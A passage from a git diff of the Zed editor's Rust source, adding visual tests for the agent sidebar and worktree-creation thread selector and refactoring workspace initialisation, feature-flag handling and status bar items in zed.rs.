|multi_workspace, _window, cx| { + multi_workspace.register_sidebar(sidebar.clone(), cx); }) .context("Failed to register sidebar")?; cx.run_until_parked(); - // Inject recent project entries into the sidebar. - // We update the sidebar entity directly (not through the MultiWorkspace window update) - // to avoid a re-entrant read panic: rebuild_entries reads MultiWorkspace, so we can't - // be inside a MultiWorkspace update when that happens. - cx.update(|cx| { - sidebar.update(cx, |sidebar, cx| { - let now = Utc::now(); - let today_timestamp = now; - let yesterday_timestamp = now - ChronoDuration::days(1); - let past_week_timestamp = now - ChronoDuration::days(10); - let all_timestamp = now - ChronoDuration::days(60); - - let recent_projects = vec![ - RecentProjectEntry { - name: "tiny-project".into(), - full_path: recent1_dir.to_string_lossy().to_string().into(), - paths: vec![recent1_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: today_timestamp, - }, - RecentProjectEntry { - name: "font-kit".into(), - full_path: recent2_dir.to_string_lossy().to_string().into(), - paths: vec![recent2_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: yesterday_timestamp, - }, - RecentProjectEntry { - name: "ideas".into(), - full_path: recent3_dir.to_string_lossy().to_string().into(), - paths: vec![recent3_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: past_week_timestamp, - }, - RecentProjectEntry { - name: "tmp".into(), - full_path: recent4_dir.to_string_lossy().to_string().into(), - paths: vec![recent4_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: all_timestamp, - }, - ]; - sidebar.set_test_recent_projects(recent_projects, cx); - }); - }); - - // Set thread info directly on the sidebar for visual testing - cx.update(|cx| { - sidebar.update(cx, |sidebar, _cx| { - sidebar.set_test_thread_info( - 0, - "Refine thread view scrolling behavior".into(), - ui::AgentThreadStatus::Completed, - ); - sidebar.set_test_thread_info( - 1, - "Add line numbers option to FileEditBlock".into(), - ui::AgentThreadStatus::Running, - ); - }); - }); + // Save test threads to the ThreadStore for each workspace + let save_tasks = multi_workspace_window + .update(cx, |multi_workspace, _window, cx| { + let thread_store = agent::ThreadStore::global(cx); + let workspaces: Vec<_> = multi_workspace.workspaces().cloned().collect(); + let mut tasks = Vec::new(); + + for (index, workspace) in workspaces.iter().enumerate() { + let workspace_ref = workspace.read(cx); + let mut paths = Vec::new(); + for worktree in workspace_ref.worktrees(cx) { + let worktree_ref = worktree.read(cx); + if worktree_ref.is_visible() { + paths.push(worktree_ref.abs_path().to_path_buf()); + } + } + let path_list = util::path_list::PathList::new(&paths); + + let (session_id, title, updated_at) = match index { + 0 => ( + "visual-test-thread-0", + "Refine thread view scrolling behavior", + chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 6, 15, 10, 30, 0) + .unwrap(), + ), + 1 => ( + "visual-test-thread-1", + "Add line numbers option to FileEditBlock", + chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 6, 15, 11, 0, 0) + .unwrap(), + ), + _ => continue, + }; + + let task = thread_store.update(cx, |store, cx| { + store.save_thread( + acp::SessionId::new(Arc::from(session_id)), + agent::DbThread { + title: title.to_string().into(), + messages: Vec::new(), + updated_at, + detailed_summary: None, + initial_project_snapshot: None, + cumulative_token_usage: Default::default(), + request_token_usage: Default::default(), + model: None, + profile: None, + imported: false, + subagent_context: None, + speed: None, + thinking_enabled: false, + thinking_effort: None, + ui_scroll_position: None, + draft_prompt: None, + }, + path_list, + cx, + ) + }); + tasks.push(task); + } + tasks + }) + .context("Failed to create test threads")?; - // Set last-worked-on thread titles on some recent projects for visual testing - cx.update(|cx| { - sidebar.update(cx, |sidebar, cx| { - sidebar.set_test_recent_project_thread_title( - recent1_dir.to_string_lossy().to_string().into(), - "Fix flaky test in CI pipeline".into(), - cx, - ); - sidebar.set_test_recent_project_thread_title( - recent2_dir.to_string_lossy().to_string().into(), - "Upgrade font rendering engine".into(), - cx, - ); - }); - }); + cx.background_executor.allow_parking(); + for task in save_tasks { + cx.foreground_executor + .block_test(task) + .context("Failed to save test thread")?; + } + cx.background_executor.forbid_parking(); cx.run_until_parked(); @@ -2911,12 +2895,12 @@ impl gpui::Render for ThreadItemIconDecorationsTestView { container() .child(ThreadItem::new("ti-none", "Default idle thread").timestamp("1:00 AM")), ) - .child(section_label("Blue dot (generation done)")) + .child(section_label("Blue dot (notified)")) .child( container().child( ThreadItem::new("ti-done", "Generation completed successfully") .timestamp("1:05 AM") - .generation_done(true), + .notified(true), ), ) .child(section_label("Yellow triangle (waiting for confirmation)")) @@ -2941,18 +2925,17 @@ impl gpui::Render for ThreadItemIconDecorationsTestView { ThreadItem::new("ti-running", "Generating response...") .icon(IconName::AiClaude) .timestamp("1:20 AM") - .running(true), + .status(ui::AgentThreadStatus::Running), ), ) .child(section_label( - "Spinner + yellow triangle (running + waiting)", + "Spinner + yellow triangle (waiting for confirmation)", )) .child( container().child( ThreadItem::new("ti-running-waiting", "Running but needs confirmation") .icon(IconName::AiClaude) .timestamp("1:25 AM") - .running(true) .status(ui::AgentThreadStatus::WaitingForConfirmation), ), ) @@ -3066,3 +3049,614 @@ fn run_error_wrapping_visual_tests( Ok(test_result) } + +#[cfg(all(target_os = "macos", feature = "visual-tests"))] +/// Runs a git command in the given directory and returns an error with +/// stderr/stdout context if the command fails (non-zero exit status). +fn run_git_command(args: &[&str], dir: &std::path::Path) -> Result<()> { + let output = std::process::Command::new("git") + .args(args) + .current_dir(dir) + .output() + .with_context(|| format!("failed to spawn `git {}`", args.join(" ")))?; + + if !output.status.success() { + let stdout = String::from_utf8_lossy(&output.stdout); + let stderr = String::from_utf8_lossy(&output.stderr); + anyhow::bail!( + "`git {}` failed (exit {})\nstdout: {}\nstderr: {}", + args.join(" "), + output.status, + stdout.trim(), + stderr.trim(), + ); + } + Ok(()) +} + +#[cfg(all(target_os = "macos", feature = "visual-tests"))] +fn run_start_thread_in_selector_visual_tests( + app_state: Arc, + cx: &mut VisualTestAppContext, + update_baseline: bool, +) -> Result { + use agent_ui::{AgentPanel, StartThreadIn, WorktreeCreationStatus}; + + // Enable feature flags so the thread target selector renders + cx.update(|cx| { + cx.update_flags(true, vec!["agent-v2".to_string()]); + }); + + // Create a temp directory with a real git repo so "New Worktree" is enabled + let temp_dir = tempfile::tempdir()?; + let temp_path = temp_dir.keep(); + let canonical_temp = temp_path.canonicalize()?; + let project_path = canonical_temp.join("project"); + std::fs::create_dir_all(&project_path)?; + + // Initialize git repo + run_git_command(&["init"], &project_path)?; + run_git_command(&["config", "user.email", "test@test.com"], &project_path)?; + run_git_command(&["config", "user.name", "Test User"], &project_path)?; + + // Create source files + let src_dir = project_path.join("src"); + std::fs::create_dir_all(&src_dir)?; + std::fs::write( + src_dir.join("main.rs"), + r#"fn main() { + println!("Hello, world!"); + + let x = 42; + let y = x * 2; + + if y > 50 { + println!("y is greater than 50"); + } else { + println!("y is not greater than 50"); + } + + for i in 0..10 { + println!("i = {}", i); + } +} + +fn helper_function(a: i32, b: i32) -> i32 { + a + b +} +"#, + )?; + + std::fs::write( + project_path.join("Cargo.toml"), + r#"[package] +name = "test_project" +version = "0.1.0" +edition = "2021" +"#, + )?; + + // Commit so git status is clean + run_git_command(&["add", "."], &project_path)?; + run_git_command(&["commit", "-m", "Initial commit"], &project_path)?; + + let project = cx.update(|cx| { + project::Project::local( + app_state.client.clone(), + app_state.node_runtime.clone(), + app_state.user_store.clone(), + app_state.languages.clone(), + app_state.fs.clone(), + None, + project::LocalProjectFlags { + init_worktree_trust: false, + ..Default::default() + }, + cx, + ) + }); + + // Use a wide window so we see project panel + editor + agent panel + let window_size = size(px(1280.0), px(800.0)); + let bounds = Bounds { + origin: point(px(0.0), px(0.0)), + size: window_size, + }; + + let workspace_window: WindowHandle = cx + .update(|cx| { + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + focus: false, + show: false, + ..Default::default() + }, + |window, cx| { + let workspace = cx.new(|cx| { + Workspace::new(None, project.clone(), app_state.clone(), window, cx) + }); + cx.new(|cx| MultiWorkspace::new(workspace, window, cx)) + }, + ) + }) + .context("Failed to open thread target selector test window")?; + + cx.run_until_parked(); + + // Create the sidebar outside the MultiWorkspace update to avoid a + // re-entrant read panic (Sidebar::new reads the MultiWorkspace). + let sidebar = cx + .update_window(workspace_window.into(), |root_view, window, cx| { + let multi_workspace_handle: Entity = root_view.downcast().unwrap(); + cx.new(|cx| sidebar::Sidebar::new(multi_workspace_handle, window, cx)) + }) + .context("Failed to create sidebar")?; + + workspace_window + .update(cx, |multi_workspace, _window, cx| { + multi_workspace.register_sidebar(sidebar.clone(), cx); + }) + .context("Failed to register sidebar")?; + + // Open the sidebar + workspace_window + .update(cx, |multi_workspace, window, cx| { + multi_workspace.toggle_sidebar(window, cx); + }) + .context("Failed to toggle sidebar")?; + + cx.run_until_parked(); + + // Add the git project as a worktree + let add_worktree_task = workspace_window + .update(cx, |multi_workspace, _window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + let project = workspace.read(cx).project().clone(); + project.update(cx, |project, cx| { + project.find_or_create_worktree(&project_path, true, cx) + }) + }) + .context("Failed to start adding worktree")?; + + cx.background_executor.allow_parking(); + cx.foreground_executor + .block_test(add_worktree_task) + .context("Failed to add worktree")?; + cx.background_executor.forbid_parking(); + + cx.run_until_parked(); + + // Wait for worktree scan and git status + for _ in 0..5 { + cx.advance_clock(Duration::from_millis(100)); + cx.run_until_parked(); + } + + // Open the project panel + let (weak_workspace, async_window_cx) = workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + (workspace.read(cx).weak_handle(), window.to_async(cx)) + }) + .context("Failed to get workspace handle")?; + + cx.background_executor.allow_parking(); + let project_panel = cx + .foreground_executor + .block_test(ProjectPanel::load(weak_workspace, async_window_cx)) + .context("Failed to load project panel")?; + cx.background_executor.forbid_parking(); + + workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + workspace.update(cx, |workspace, cx| { + workspace.add_panel(project_panel, window, cx); + workspace.open_panel::(window, cx); + }); + }) + .context("Failed to add project panel")?; + + cx.run_until_parked(); + + // Open main.rs in the editor + let open_file_task = workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + workspace.update(cx, |workspace, cx| { + let worktree = workspace.project().read(cx).worktrees(cx).next(); + if let Some(worktree) = worktree { + let worktree_id = worktree.read(cx).id(); + let rel_path: std::sync::Arc = + util::rel_path::rel_path("src/main.rs").into(); + let project_path: project::ProjectPath = (worktree_id, rel_path).into(); + Some(workspace.open_path(project_path, None, true, window, cx)) + } else { + None + } + }) + }) + .log_err() + .flatten(); + + if let Some(task) = open_file_task { + cx.background_executor.allow_parking(); + cx.foreground_executor.block_test(task).log_err(); + cx.background_executor.forbid_parking(); + } + + cx.run_until_parked(); + + // Load the AgentPanel + let (weak_workspace, async_window_cx) = workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + (workspace.read(cx).weak_handle(), window.to_async(cx)) + }) + .context("Failed to get workspace handle for agent panel")?; + + // Register an observer so that workspaces created by the worktree creation + // flow get AgentPanel and ProjectPanel loaded automatically. Without this, + // `workspace.panel::(cx)` returns None in the new workspace and + // the creation flow's `focus_panel::` call is a no-op. + let _workspace_observer = cx.update(|cx| { + cx.observe_new(move |workspace: &mut Workspace, window, cx| { + let Some(window) = window else { return }; + let panels_task = cx.spawn_in(window, async move |workspace_handle, cx| { + let project_panel = ProjectPanel::load(workspace_handle.clone(), cx.clone()); + let agent_panel = AgentPanel::load(workspace_handle.clone(), cx.clone()); + if let Ok(panel) = project_panel.await { + workspace_handle + .update_in(cx, |workspace, window, cx| { + workspace.add_panel(panel, window, cx); + }) + .log_err(); + } + if let Ok(panel) = agent_panel.await { + workspace_handle + .update_in(cx, |workspace, window, cx| { + workspace.add_panel(panel, window, cx); + }) + .log_err(); + } + anyhow::Ok(()) + }); + workspace.set_panels_task(panels_task); + }) + }); + + cx.background_executor.allow_parking(); + let panel = cx + .foreground_executor + .block_test(AgentPanel::load(weak_workspace, async_window_cx)) + .context("Failed to load AgentPanel")?; + cx.background_executor.forbid_parking(); + + workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + workspace.update(cx, |workspace, cx| { + workspace.add_panel(panel.clone(), window, cx); + workspace.open_panel::(window, cx); + }); + }) + .context("Failed to add and open AgentPanel")?; + + cx.run_until_parked(); + + // Inject the stub server and open a thread so the toolbar is visible + let connection = StubAgentConnection::new(); + let stub_agent: Rc = Rc::new(StubAgentServer::new(connection)); + + cx.update_window(workspace_window.into(), |_, window, cx| { + panel.update(cx, |panel, cx| { + panel.open_external_thread_with_server(stub_agent.clone(), window, cx); + }); + })?; + + cx.run_until_parked(); + + // ---- Screenshot 1: Default "Local Project" selector (dropdown closed) ---- + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_default = run_visual_test( + "start_thread_in_selector_default", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 2: Dropdown open showing menu entries ---- + cx.update_window(workspace_window.into(), |_, window, cx| { + panel.update(cx, |panel, cx| { + panel.open_start_thread_in_menu_for_tests(window, cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_open_dropdown = run_visual_test( + "start_thread_in_selector_open", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 3: "New Worktree" selected (dropdown closed, label changed) ---- + // First dismiss the dropdown, then change the target so the toolbar label is visible + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.close_start_thread_in_menu_for_tests(cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.set_start_thread_in_for_tests(StartThreadIn::NewWorktree, cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_new_worktree = run_visual_test( + "start_thread_in_selector_new_worktree", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 4: "Creating worktree…" status banner ---- + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel + .set_worktree_creation_status_for_tests(Some(WorktreeCreationStatus::Creating), cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_creating = run_visual_test( + "worktree_creation_status_creating", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 5: Error status banner ---- + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.set_worktree_creation_status_for_tests( + Some(WorktreeCreationStatus::Error( + "Failed to create worktree: branch already exists".into(), + )), + cx, + ); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_error = run_visual_test( + "worktree_creation_status_error", + workspace_window.into(), + cx, + update_baseline, + ); + + // ---- Screenshot 6: Worktree creation succeeded ---- + // Clear the error status and re-select New Worktree to ensure a clean state. + cx.update_window(workspace_window.into(), |_, _window, cx| { + panel.update(cx, |panel, cx| { + panel.set_worktree_creation_status_for_tests(None, cx); + }); + })?; + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, cx| { + window.dispatch_action(Box::new(StartThreadIn::NewWorktree), cx); + })?; + cx.run_until_parked(); + + // Insert a message into the active thread's message editor and submit. + let thread_view = cx + .read(|cx| panel.read(cx).active_thread_view(cx)) + .ok_or_else(|| anyhow::anyhow!("No active thread view"))?; + + cx.update_window(workspace_window.into(), |_, window, cx| { + let message_editor = thread_view.read(cx).message_editor.clone(); + message_editor.update(cx, |message_editor, cx| { + message_editor.set_message( + vec![acp::ContentBlock::Text(acp::TextContent::new( + "Add a CLI flag to set the log level".to_string(), + ))], + window, + cx, + ); + message_editor.send(cx); + }); + })?; + cx.run_until_parked(); + + // Wait for the full worktree creation flow to complete. The creation status + // is cleared to `None` at the very end of the async task, after panels are + // loaded, the agent panel is focused, and the new workspace is activated. + cx.background_executor.allow_parking(); + let mut creation_complete = false; + for _ in 0..120 { + cx.run_until_parked(); + let status_cleared = cx.read(|cx| { + panel + .read(cx) + .worktree_creation_status_for_tests() + .is_none() + }); + let workspace_count = workspace_window.update(cx, |multi_workspace, _window, _cx| { + multi_workspace.workspaces().count() + })?; + if workspace_count == 2 && status_cleared { + creation_complete = true; + break; + } + cx.advance_clock(Duration::from_millis(100)); + } + cx.background_executor.forbid_parking(); + + if !creation_complete { + return Err(anyhow::anyhow!("Worktree creation did not complete")); + } + + // The creation flow called `external_thread` on the new workspace's agent + // panel, which tried to launch a real agent binary and failed. Replace the + // error state by injecting the stub server, and shrink the panel so the + // editor content is visible. + workspace_window.update(cx, |multi_workspace, window, cx| { + let new_workspace = multi_workspace.workspaces().nth(1).unwrap(); + new_workspace.update(cx, |workspace, cx| { + if let Some(new_panel) = workspace.panel::(cx) { + new_panel.update(cx, |panel, cx| { + panel.open_external_thread_with_server(stub_agent.clone(), window, cx); + }); + } + }); + })?; + cx.run_until_parked(); + + // Type and send a message so the thread target dropdown disappears. + let new_panel = workspace_window.update(cx, |multi_workspace, _window, cx| { + let new_workspace = multi_workspace.workspaces().nth(1).unwrap(); + new_workspace.read(cx).panel::(cx) + })?; + if let Some(new_panel) = new_panel { + let new_thread_view = cx.read(|cx| new_panel.read(cx).active_thread_view(cx)); + if let Some(new_thread_view) = new_thread_view { + cx.update_window(workspace_window.into(), |_, window, cx| { + let message_editor = new_thread_view.read(cx).message_editor.clone(); + message_editor.update(cx, |editor, cx| { + editor.set_message( + vec![acp::ContentBlock::Text(acp::TextContent::new( + "Add a CLI flag to set the log level".to_string(), + ))], + window, + cx, + ); + editor.send(cx); + }); + })?; + cx.run_until_parked(); + } + } + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.refresh(); + })?; + cx.run_until_parked(); + + let result_succeeded = run_visual_test( + "worktree_creation_succeeded", + workspace_window.into(), + cx, + update_baseline, + ); + + // Clean up — drop the workspace observer first so no new panels are + // registered on workspaces created during teardown. + drop(_workspace_observer); + + workspace_window + .update(cx, |multi_workspace, _window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + let project = workspace.read(cx).project().clone(); + project.update(cx, |project, cx| { + let worktree_ids: Vec<_> = + project.worktrees(cx).map(|wt| wt.read(cx).id()).collect(); + for id in worktree_ids { + project.remove_worktree(id, cx); + } + }); + }) + .log_err(); + + cx.run_until_parked(); + + cx.update_window(workspace_window.into(), |_, window, _cx| { + window.remove_window(); + }) + .log_err(); + + cx.run_until_parked(); + + for _ in 0..15 { + cx.advance_clock(Duration::from_millis(100)); + cx.run_until_parked(); + } + + // Delete the preserved temp directory so visual-test runs don't + // accumulate filesystem artifacts. + if let Err(err) = std::fs::remove_dir_all(&temp_path) { + log::warn!( + "failed to clean up visual-test temp dir {}: {err}", + temp_path.display() + ); + } + + // Reset feature flags + cx.update(|cx| { + cx.update_flags(false, vec![]); + }); + + let results = [ + ("default", result_default), + ("open_dropdown", result_open_dropdown), + ("new_worktree", result_new_worktree), + ("creating", result_creating), + ("error", result_error), + ("succeeded", result_succeeded), + ]; + + let mut has_baseline_update = None; + let mut failures = Vec::new(); + + for (name, result) in &results { + match result { + Ok(TestResult::Passed) => {} + Ok(TestResult::BaselineUpdated(p)) => { + has_baseline_update = Some(p.clone()); + } + Err(e) => { + failures.push(format!("{}: {}", name, e)); + } + } + } + + if !failures.is_empty() { + Err(anyhow::anyhow!( + "start_thread_in_selector failures: {}", + failures.join("; ") + )) + } else if let Some(p) = has_baseline_update { + Ok(TestResult::BaselineUpdated(p)) + } else { + Ok(TestResult::Passed) + } +} diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index bbbce4986607aa5b64453e8bceb61375a49a7122..03e128415e1aa8390d1b95816755d3644064dada 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -13,11 +13,11 @@ pub mod visual_tests; #[cfg(target_os = "windows")] pub(crate) mod windows_only_instance; -use agent_ui::{AgentDiffToolbar, AgentPanelDelegate}; +use agent_ui::AgentDiffToolbar; use anyhow::Context as _; pub use app_menus::*; use assets::Assets; -use audio::{AudioSettings, REPLAY_DURATION}; + use breadcrumbs::Breadcrumbs; use client::zed_urls; use collections::VecDeque; @@ -33,10 +33,11 @@ use git_ui::commit_view::CommitViewToolbar; use git_ui::git_panel::GitPanel; use git_ui::project_diff::{BranchDiffToolbar, ProjectDiffToolbar}; use gpui::{ - Action, App, AppContext as _, AsyncWindowContext, Context, DismissEvent, Element, Entity, - Focusable, KeyBinding, ParentElement, PathPromptOptions, PromptLevel, ReadGlobal, SharedString, - Task, TitlebarOptions, UpdateGlobal, WeakEntity, Window, WindowHandle, WindowKind, - WindowOptions, actions, image_cache, point, px, retain_all, + Action, App, AppContext as _, AsyncWindowContext, ClipboardItem, Context, DismissEvent, + Element, Entity, FocusHandle, Focusable, Image, ImageFormat, KeyBinding, ParentElement, + PathPromptOptions, PromptLevel, ReadGlobal, SharedString, Size, Task, TitlebarOptions, + UpdateGlobal, WeakEntity, Window, WindowBounds, WindowHandle, WindowKind, WindowOptions, + actions, image_cache, img, point, px, retain_all, }; use image_viewer::ImageInfo; use language::Capability; @@ -56,7 +57,6 @@ use paths::{ }; use project::{DirectoryLister, DisableAiSettings, ProjectItem}; use project_panel::ProjectPanel; -use prompt_store::PromptBuilder; use quick_action_bar::QuickActionBar; use recent_projects::open_remote_project; use release_channel::{AppCommitSha, AppVersion, ReleaseChannel}; @@ -69,7 +69,7 @@ use settings::{ update_settings_file, }; use sidebar::Sidebar; -use std::time::Duration; + use std::{ borrow::Cow, path::{Path, PathBuf}, @@ -77,16 +77,15 @@ use std::{ sync::atomic::{self, AtomicBool}, }; use terminal_view::terminal_panel::{self, TerminalPanel}; -use theme::{ActiveTheme, GlobalTheme, SystemAppearance, ThemeRegistry, ThemeSettings}; -use ui::{PopoverMenuHandle, prelude::*}; +use theme::{ActiveTheme, SystemAppearance, ThemeRegistry, deserialize_icon_theme}; +use theme_settings::{ThemeSettings, load_user_theme}; +use ui::{Navigable, NavigableEntry, PopoverMenuHandle, TintColor, prelude::*}; use util::markdown::MarkdownString; use util::rel_path::RelPath; use util::{ResultExt, asset_str, maybe}; use uuid::Uuid; use vim_mode_setting::VimModeSetting; -use workspace::notifications::{ - NotificationId, SuppressEvent, dismiss_app_notification, show_app_notification, -}; +use workspace::notifications::{NotificationId, dismiss_app_notification, show_app_notification}; use workspace::{ AppState, MultiWorkspace, NewFile, NewWindow, OpenLog, Panel, Toast, Workspace, @@ -94,13 +93,12 @@ use workspace::{ notifications::simple_message_notification::MessageNotification, open_new, }; use workspace::{ - CloseIntent, CloseProject, CloseWindow, NotificationFrame, RestoreBanner, - with_active_or_new_workspace, + CloseIntent, CloseProject, CloseWindow, RestoreBanner, with_active_or_new_workspace, }; use workspace::{Pane, notifications::DetachAndPromptErr}; use zed_actions::{ - OpenAccountSettings, OpenBrowser, OpenDocs, OpenServerSettings, OpenSettingsFile, OpenZedUrl, - Quit, + About, OpenAccountSettings, OpenBrowser, OpenDocs, OpenServerSettings, OpenSettingsFile, + OpenZedUrl, Quit, }; actions!( @@ -144,10 +142,6 @@ actions!( actions!( dev, [ - /// Stores last 30s of audio from zed staff using the experimental rodio - /// audio system (including yourself) on the current call in a tar file - /// in the current working directory. - CaptureRecentAudio, /// Opens a prompt to enter a URL to open. OpenUrlPrompt, ] @@ -163,21 +157,24 @@ pub fn init(cx: &mut App) { cx.on_action(quit); cx.on_action(|_: &RestoreBanner, cx| title_bar::restore_banner(cx)); - let flag = cx.wait_for_flag::(); - cx.spawn(async |cx| { - if cx.update(|cx| ReleaseChannel::global(cx) == ReleaseChannel::Dev) || flag.await { - cx.update(|cx| { - cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action")) - .on_action(|_: &TestCrash, _| { - unsafe extern "C" { - fn puts(s: *const i8); - } - unsafe { - puts(0xabad1d3a as *const i8); - } - }); - }); - }; + + cx.observe_flag::({ + let mut added = false; + move |enabled, cx| { + if added || !enabled { + return; + } + added = true; + cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action")) + .on_action(|_: &TestCrash, _| { + unsafe extern "C" { + fn puts(s: *const i8); + } + unsafe { + puts(0xabad1d3a as *const i8); + } + }); + } }) .detach(); cx.on_action(|_: &OpenLog, cx| { @@ -281,10 +278,8 @@ pub fn init(cx: &mut App) { ); }); }) - .on_action(|_: &zed_actions::About, cx| { - with_active_or_new_workspace(cx, |workspace, window, cx| { - about(workspace, window, cx); - }); + .on_action(|_: &About, cx| { + open_about_window(cx); }); } @@ -295,7 +290,7 @@ fn bind_on_window_closed(cx: &mut App) -> Option { .on_last_window_closed .is_quit_app() .then(|| { - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { if cx.windows().is_empty() { cx.quit(); } @@ -304,7 +299,7 @@ fn bind_on_window_closed(cx: &mut App) -> Option { } #[cfg(not(target_os = "macos"))] { - Some(cx.on_window_closed(|cx| { + Some(cx.on_window_closed(|cx, _window_id| { if cx.windows().is_empty() { cx.quit(); } @@ -358,11 +353,7 @@ pub fn build_window_options(display_uuid: Option, cx: &mut App) -> WindowO } } -pub fn initialize_workspace( - app_state: Arc, - prompt_builder: Arc, - cx: &mut App, -) { +pub fn initialize_workspace(app_state: Arc, cx: &mut App) { let mut _on_close_subscription = bind_on_window_closed(cx); cx.observe_global::(move |cx| { // A 1.92 regression causes unused-assignment to trigger on this variable. @@ -371,15 +362,39 @@ pub fn initialize_workspace( }) .detach(); - cx.observe_new(|multi_workspace: &mut MultiWorkspace, window, cx| { + cx.observe_new(|_multi_workspace: &mut MultiWorkspace, window, cx| { let Some(window) = window else { return; }; - let multi_workspace_handle = cx.entity(); - let sidebar = cx.new(|cx| Sidebar::new(multi_workspace_handle.clone(), window, cx)); - multi_workspace.register_sidebar(sidebar, window, cx); - let multi_workspace_handle = multi_workspace_handle.downgrade(); + #[cfg(feature = "track-project-leak")] + { + let multi_workspace_handle = cx.weak_entity(); + let workspace_handle = _multi_workspace.workspace().downgrade(); + let project_handle = _multi_workspace.workspace().read(cx).project().downgrade(); + let window_id_2 = window.window_handle().window_id(); + cx.on_window_closed(move |cx, window_id| { + let multi_workspace_handle = multi_workspace_handle.clone(); + let workspace_handle = workspace_handle.clone(); + let project_handle = project_handle.clone(); + if window_id != window_id_2 { + return; + } + cx.spawn(async move |cx| { + cx.background_executor() + .timer(std::time::Duration::from_millis(1500)) + .await; + + multi_workspace_handle.assert_released(); + workspace_handle.assert_released(); + project_handle.assert_released(); + }) + .detach(); + }) + .detach(); + } + + let multi_workspace_handle = cx.entity().downgrade(); window.on_window_should_close(cx, move |window, cx| { multi_workspace_handle .update(cx, |multi_workspace, cx| { @@ -389,6 +404,20 @@ pub fn initialize_workspace( }) .unwrap_or(true) }); + + let window_handle = window.window_handle(); + let multi_workspace_handle = cx.entity(); + cx.defer(move |cx| { + window_handle + .update(cx, |_, window, cx| { + let sidebar = + cx.new(|cx| Sidebar::new(multi_workspace_handle.clone(), window, cx)); + multi_workspace_handle.update(cx, |multi_workspace, cx| { + multi_workspace.register_sidebar(sidebar, cx); + }); + }) + .ok(); + }); }) .detach(); @@ -422,16 +451,7 @@ pub fn initialize_workspace( if let Some(specs) = window.gpu_specs() { log::info!("Using GPU: {:?}", specs); show_software_emulation_warning_if_needed(specs.clone(), window, cx); - if let Some((crash_server, message)) = crashes::CRASH_HANDLER - .get() - .zip(bincode::serialize(&specs).ok()) - && let Err(err) = crash_server.send_message(3, message) - { - log::warn!( - "Failed to store active gpu info for crash reporting: {}", - err - ); - } + crashes::set_gpu_info(specs); } let edit_prediction_menu_handle = PopoverMenuHandle::default(); @@ -453,6 +473,7 @@ pub fn initialize_workspace( let search_button = cx.new(|_| search::search_status_button::SearchButton::new()); let diagnostic_summary = cx.new(|cx| diagnostics::items::DiagnosticIndicator::new(workspace, cx)); + let active_file_name = cx.new(|_| workspace::active_file_name::ActiveFileName::new()); let activity_indicator = activity_indicator::ActivityIndicator::new( workspace, workspace.project().read(cx).languages().clone(), @@ -481,11 +502,15 @@ pub fn initialize_workspace( cx.new(|_| go_to_line::cursor_position::CursorPosition::new(workspace)); let line_ending_indicator = cx.new(|_| line_ending_selector::LineEndingIndicator::default()); + let merge_conflict_indicator = + cx.new(|cx| git_ui::MergeConflictIndicator::new(workspace, cx)); workspace.status_bar().update(cx, |status_bar, cx| { status_bar.add_left_item(search_button, window, cx); status_bar.add_left_item(lsp_button, window, cx); status_bar.add_left_item(diagnostic_summary, window, cx); + status_bar.add_left_item(active_file_name, window, cx); status_bar.add_left_item(activity_indicator, window, cx); + status_bar.add_left_item(merge_conflict_indicator, window, cx); status_bar.add_right_item(edit_prediction_ui, window, cx); status_bar.add_right_item(active_buffer_encoding, window, cx); status_bar.add_right_item(active_buffer_language, window, cx); @@ -496,10 +521,13 @@ pub fn initialize_workspace( status_bar.add_right_item(image_info, window, cx); }); - initialize_panels(prompt_builder.clone(), window, cx); + let panels_task = initialize_panels(window, cx); + workspace.set_panels_task(panels_task); register_actions(app_state.clone(), workspace, window, cx); - workspace.focus_handle(cx).focus(window, cx); + if !workspace.has_active_modal(window, cx) { + workspace.focus_handle(cx).focus(window, cx); + } }) .detach(); } @@ -616,11 +644,7 @@ fn show_software_emulation_warning_if_needed( } } -fn initialize_panels( - prompt_builder: 